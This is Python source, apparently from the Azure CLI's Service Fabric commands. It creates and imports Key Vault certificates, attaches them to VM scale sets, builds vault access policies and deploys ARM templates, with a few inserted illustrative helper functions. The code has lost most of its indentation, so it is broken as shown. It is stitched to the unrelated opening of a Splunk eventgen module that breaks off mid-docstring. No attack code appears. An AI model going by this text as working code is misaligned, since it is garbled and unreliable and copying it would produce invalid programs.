certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
                '\'--certificate-subject-name\' is ignored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
                '\'--certificate-output-folder\' is ignored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
                    '\'--certificate-file\' is ignored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
                    '\'--certificate-password\' is ignored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
                    '\'--certificate-output-folder\' is ignored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
                    '\'--certificate-subject-name\' is ignored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
                        '\'--certificate-file\' is ignored if \'--certificate-subject-name\' is present')
if secret_identifier:
raise CLIError(
                        '\'--secret-identifier\' is ignored if \'--certificate-subject-name\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
_verify_cert_function_parameter(certificate_file, certificate_password,
vault_name, vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
output_file = None
rg = _get_resource_group_by_name(cli_ctx, resource_group_name)
location = rg.location
vault_id = None
secret_url = None
certificate_thumbprint = None
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
_create_keyvault.__doc__ = VaultProperties.__doc__
if secret_identifier is not None:
vault = _get_vault_from_secret_identifier(cli_ctx, secret_identifier)
vault_id = vault.id
certificate_thumbprint = _get_thumbprint_from_secret_identifier(
cli_ctx, vault, secret_identifier)
secret_url = secret_identifier
else:
if vault_resource_group_name is None:
logger.info("vault_resource_group_name not set, using %s.", resource_group_name)
vault_resource_group_name = resource_group_name
if vault_name is None:
logger.info("vault_name not set using '%s' as vault name.", vault_resource_group_name)
vault_name = vault_resource_group_name
vault = _safe_get_vault(cli_ctx, vault_resource_group_name, vault_name)
if certificate_file is not None:
if vault is None:
logger.info("Creating key vault")
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
logger.info("Import certificate")
result = import_certificate(
cli_ctx, vault_uri, certificate_name, certificate_file, password=certificate_password)
vault_id = vault.id
secret_url = result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(result.x509_thumbprint))
else:
if vault is None:
logger.info("Creating key vault")
if cmd.supported_api_version(resource_type=ResourceType.MGMT_KEYVAULT, min_api='2018-02-14'):
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True).result()
else:
vault = _create_keyvault(
cmd, cli_ctx, vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
logger.info("Wait for key vault ready")
time.sleep(20)
vault_uri = vault.properties.vault_uri
certificate_name = _get_certificate_name(certificate_subject_name, resource_group_name)
policy = _get_default_policy(cli_ctx, certificate_subject_name)
logger.info("Creating self-signed certificate")
_create_self_signed_key_vault_certificate.__doc__ = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'key_vault_client#KeyVaultClient').__doc__
result = _create_self_signed_key_vault_certificate(
cli_ctx, vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
kv_result = result[0]
output_file = result[1]
vault_id = vault.id
secret_url = kv_result.sid
import base64
certificate_thumbprint = b64_to_hex(
base64.b64encode(kv_result.x509_thumbprint))
return vault_id, secret_url, certificate_thumbprint, output_file
# pylint: disable=inconsistent-return-statements
def _add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url):
compute_client = compute_client_factory(cli_ctx)
secrets = [
s for s in vmss.virtual_machine_profile.os_profile.secrets if s.source_vault.id == vault_id]
if secrets is None or secrets == []:
if vmss.virtual_machine_profile.os_profile.secrets is None:
vmss.virtual_machine_profile.os_profile.secrets = []
new_vault_certificates = []
new_vault_certificates.append(VaultCertificate(certificate_url=secret_url, certificate_store='my'))
new_source_vault = SubResource(id=vault_id)
vmss.virtual_machine_profile.os_profile.secrets.append(VaultSecretGroup(source_vault=new_source_vault,
vault_certificates=new_vault_certificates))
else:
if secrets[0].vault_certificates is not None:
certs = [
c for c in secrets[0].vault_certificates if c.certificate_url == secret_url]
if certs is None or certs == []:
secrets[0].vault_certificates.append(
VaultCertificate(certificate_url=secret_url, certificate_store='my'))
else:
return
else:
secrets[0].vault_certificates = []
secrets[0].vault_certificates.append(
VaultCertificate(secret_url, 'my'))
poller = compute_client.virtual_machine_scale_sets.begin_create_or_update(
resource_group_name, vmss.name, vmss)
return LongRunningOperation(cli_ctx)(poller)
def _get_sf_vm_extension(vmss):
fabric_ext = None
for ext in vmss.virtual_machine_profile.extension_profile.extensions:
extension_type = None
if hasattr(ext, 'type1') and ext.type1 is not None:
extension_type = ext.type1.lower()
elif hasattr(ext, 'type_properties_type') and ext.type_properties_type is not None:
extension_type = ext.type_properties_type.lower()
if extension_type is not None and extension_type in (SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME, SERVICE_FABRIC_LINUX_NODE_EXT_NAME):
fabric_ext = ext
break
if fabric_ext is None or fabric_ext == []:
return None
return fabric_ext
def _get_cluster_id_in_sf_extension(fabric_ext):
cluster_endpoint = fabric_ext.settings["clusterEndpoint"]
endpoint_list = cluster_endpoint.split('/')
cluster_id = endpoint_list[len(endpoint_list) - 1]
return cluster_id
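# Illustrative sketch, not part of the original source: the cluster id is simply the
# last path segment of the Service Fabric extension's clusterEndpoint setting. The
# endpoint value below is made up.
def _example_cluster_id_extraction():
    endpoint = 'https://westus.servicefabric.azure.com/runtime/clusters/00000000-0000-0000-0000-000000000000'
    cluster_id = endpoint.split('/')[-1]
    assert cluster_id == '00000000-0000-0000-0000-000000000000'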
def _add_cert_to_all_vmss(cli_ctx, resource_group_name, cluster_id, vault_id, secret_url, is_cluster_cert=False, thumbprint=None):
threads = []
import threading
compute_client = compute_client_factory(cli_ctx)
vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
if vmsses is not None:
for vmss in vmsses:
fabric_ext = _get_sf_vm_extension(vmss)
if fabric_ext is not None and (cluster_id is None or _get_cluster_id_in_sf_extension(fabric_ext).lower() == cluster_id.lower()):
if is_cluster_cert:
# add cert to sf extension
import json
secondary_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext.settings["certificateSecondary"] = secondary_setting
t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
t.start()
threads.append(t)
for t in threads:
t.join()
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if 0 < size < 3:
return 'None'
if 3 <= size < 5:
return 'Bronze'
if 5 <= size < 7:
return 'Silver'
if 7 <= size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
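# Illustrative sketch, not part of the original source: reliability level and target
# instance count are both derived from the primary node type size, e.g. a 5-node
# cluster maps to 'Silver', which in turn requires 5 target instances.
def _example_reliability_to_instance_count():
    level = _get_reliability_level(5)
    assert level == 'Silver'
    assert _get_target_instance(level) == 5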
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
settings = []
if setting_dict and any(setting_dict):
for k, v in setting_dict.items():
parameters = []
setting_des = SettingsSectionDescription(name=k, parameters=parameters)
for kk, vv in v.items():
setting_des.parameters.append(
SettingsParameterDescription(name=kk, value=vv))
if setting_des.parameters and any(setting_des.parameters):
settings.append(setting_des)
return settings
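# Illustrative sketch, not part of the original source: the two helpers above are
# inverses of each other. The section and parameter names below are placeholders.
def _example_fabric_settings_round_trip():
    settings_dict = {'Security': {'ClusterProtectionLevel': 'EncryptAndSign'}}
    sections = _dict_to_fabric_settings(settings_dict)
    assert _fabric_settings_to_dict(sections) == settings_dict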
def _deploy_arm_template_core(cmd,
resource_group_name,
template,
parameters,
deployment_name=None,
mode='incremental',
validate_only=False,
no_wait=False):
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, template_link=None, parameters=parameters, mode=mode)
client = resource_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate_only:
deploy_poll = sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
deployment)
else:
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name,
deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
if validate_only:
return sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name,
properties)
deploy_poll = sdk_no_wait(no_wait, client.deployments.create_or_update, resource_group_name, deployment_name,
properties)
return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(certificate_subject_name, resource_group_name):
if certificate_subject_name is None:
certificate_name = resource_group_name
else:
certificate_name = certificate_subject_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
if certificate_subject_name is None:
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
certificate_name = "{}{}".format(certificate_name, suffix)
return certificate_name
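# Illustrative sketch, not part of the original source: characters other than letters,
# digits and '-' are stripped from the subject name, and a timestamp suffix is only
# appended when no subject name was supplied. The names below are placeholders.
def _example_certificate_name_sanitization():
    assert _get_certificate_name('my.cluster.westus', 'my-rg') == 'myclusterwestus'
    generated = _get_certificate_name(None, 'my-rg')
    assert generated.startswith('my-rg')  # followed by a %Y%m%d%H%M timestamp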
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
vault_name = urlparse(secret_identifier).hostname.split('.')[0]
vaults = key_vault_client.list()
if vaults is not None:
vault = [v for v in vaults if v.name.lower() == vault_name.lower()]
if vault:
return vault[0]
raise CLIError("Unable to find vault with name '{}'. Please make sure the secret identifier '{}' is correct.".format(vault_name, secret_identifier))
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
client = keyvault_client_factory(cli_ctx).vaults
vault_resource_group_name = vault.id.split('/')[4]
v = client.get(vault_resource_group_name, vault.name)
vault_uri = v.properties.vault_uri
return vault_uri, vault_resource_group_name
def _safe_get_vault(cli_ctx, resource_group_name, vault_name):
key_vault_client = keyvault_client_factory(cli_ctx).vaults
try:
vault = key_vault_client.get(resource_group_name, vault_name)
return vault
except CloudError as ex:
if ex.error.error == 'ResourceNotFound':
return None
raise
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
secret_uri = urlparse(secret_identifier)
path = secret_uri.path
segment = path.split('/')
secret_name = segment[2]
secret_version = segment[3]
vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
vault_uri = vault_uri_group[0]
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
cert_bytes = secret.value
x509 = None
import base64
decoded = base64.b64decode(cert_bytes)
try:
x509 = crypto.load_pkcs12(decoded).get_certificate()
except (ValueError, crypto.Error):
pass
if not x509:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
if not x509:
raise Exception('invalid certificate')
thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
return thumbprint
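# Illustrative sketch, not part of the original source: a Key Vault secret identifier
# decomposes into vault name, secret name and secret version exactly as the helpers
# above expect. The URL below is a placeholder.
def _example_secret_identifier_parts():
    secret_identifier = 'https://myvault.vault.azure.net/secrets/cluster-cert/0123abcd'
    parsed = urlparse(secret_identifier)
    segments = parsed.path.split('/')
    assert parsed.hostname.split('.')[0] == 'myvault'                  # vault name
    assert (segments[2], segments[3]) == ('cluster-cert', '0123abcd')  # secret name, version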
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
disabled=False, password=None, certificate_policy=None, tags=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
import binascii
    with open(certificate_data, 'rb') as f:
        certificate_data = f.read()
x509 = None
content_type = None
try:
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
# if we get here, we know it was a PEM file
content_type = 'application/x-pem-file'
try:
# for PEM files (including automatic endline conversion for
# Windows)
certificate_data = certificate_data.decode(
'utf-8').replace('\r\n', '\n')
except UnicodeDecodeError:
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except (ValueError, crypto.Error):
pass
if not x509:
try:
if password:
x509 = crypto.load_pkcs12(
certificate_data, password).get_certificate()
else:
x509 = crypto.load_pkcs12(certificate_data).get_certificate()
content_type = 'application/x-pkcs12'
certificate_data = binascii.b2a_base64(
certificate_data).decode('utf-8')
except crypto.Error:
raise CLIError(
'We could not parse the provided certificate as .pem or .pfx. '
'Please verify the certificate with OpenSSL.')
not_before, not_after = None, None
if x509.get_notBefore():
not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(cli_ctx, subject):
    if not subject.lower().startswith('cn'):
subject = "CN={0}".format(subject)
return _default_certificate_profile(cli_ctx, subject)
def _default_certificate_profile(cli_ctx, subject):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
ActionType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#ActionType')
KeyUsageType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#KeyUsageType')
IssuerParameters = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.issuer_parameters#IssuerParameters')
KeyProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_properties#KeyProperties')
LifetimeAction = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.lifetime_action#LifetimeAction')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
X509CertificateProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.x509_certificate_properties#X509CertificateProperties')
Trigger = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.trigger#Trigger')
Action = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.action#Action')
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
cert_attrs = CertificateAttributes(enabled=not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
    # loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
os.makedirs(certificate_output_folder, exist_ok=True)
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token), api_version=version)
return client
def _create_keyvault(cmd,
cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=None,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
VaultCreateOrUpdateParameters = cmd.get_models('VaultCreateOrUpdateParameters', resource_type=ResourceType.MGMT_KEYVAULT)
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
KeyVaultSku = cmd.get_models('Sku', resource_type=ResourceType.MGMT_KEYVAULT)
AccessPolicyEntry = cmd.get_models('AccessPolicyEntry', resource_type=ResourceType.MGMT_KEYVAULT)
Permissions = cmd.get_models('Permissions', resource_type=ResourceType.MGMT_KEYVAULT)
CertificatePermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#CertificatePermissions')
KeyPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#KeyPermissions')
SecretPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#SecretPermissions')
KeyVaultSkuName = cmd.get_models('SkuName', resource_type=ResourceType.MGMT_KEYVAULT)
if not sku:
sku = KeyVaultSkuName.standard.value
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.signed_in_user.get()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
if subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
if "Datacenter-Core-1709" in os_type:
parameters['vmImageOffer']['value'] = 'WindowsServerSemiAnnual'
return parameters
def _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
logger.info('Primary certificate parameters are not present in parameters file')
        raise CLIError('The primary certificate parameters in the parameters file must be named '
                       '\'sourceVaultValue\', \'certificateThumbprint\' and \'certificateUrlValue\'. '
                       'If secondary certificate parameters are also supplied, they must be named '
                       '\'secSourceVaultValue\', \'secCertificateThumbprint\' and \'secCertificateUrlValue\'.')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
        parameters[SEC_SOURCE_VAULT_VALUE]['value'] = result[0]
        parameters[SEC_CERTIFICATE_URL_VALUE]['value'] = result[1]
        parameters[SEC_CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
            raise CLIError('The primary certificate parameters in the parameters file must be named '
                           '\'sourceVaultValue\', \'certificateThumbprint\' and \'certificateUrlValue\'. '
                           'If secondary certificate parameters are also supplied, they must be named '
                           '\'secSourceVaultValue\', \'secCertificateThumbprint\' and \'secCertificateUrlValue\'.')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
|
eventgen_core.py
|
#!/usr/bin/env python3
# encoding: utf-8
import imp
import logging
import logging.config
import os
import sys
import time
from queue import Empty, Queue
import signal
from threading import Thread, Event
import multiprocessing
from splunk_eventgen.lib.eventgenconfig import Config
from splunk_eventgen.lib.eventgenexceptions import PluginNotLoaded
from splunk_eventgen.lib.eventgentimer import Timer
from splunk_eventgen.lib.outputcounter import OutputCounter
from splunk_eventgen.lib.logging_config import logger
FILE_PATH = os.path.dirname(os.path.realpath(__file__))
EVENTGEN_DIR = os.path.realpath(os.path.join(FILE_PATH, ".."))
EVENTGEN_ENGINE_CONF_PATH = os.path.abspath(os.path.join(FILE_PATH, "default", "eventgen_engine.conf"))
class EventGenerator(object):
def __init__(self, args=None):
'''
This object will allow you to generate and control eventgen. It should be handed the parse_args object
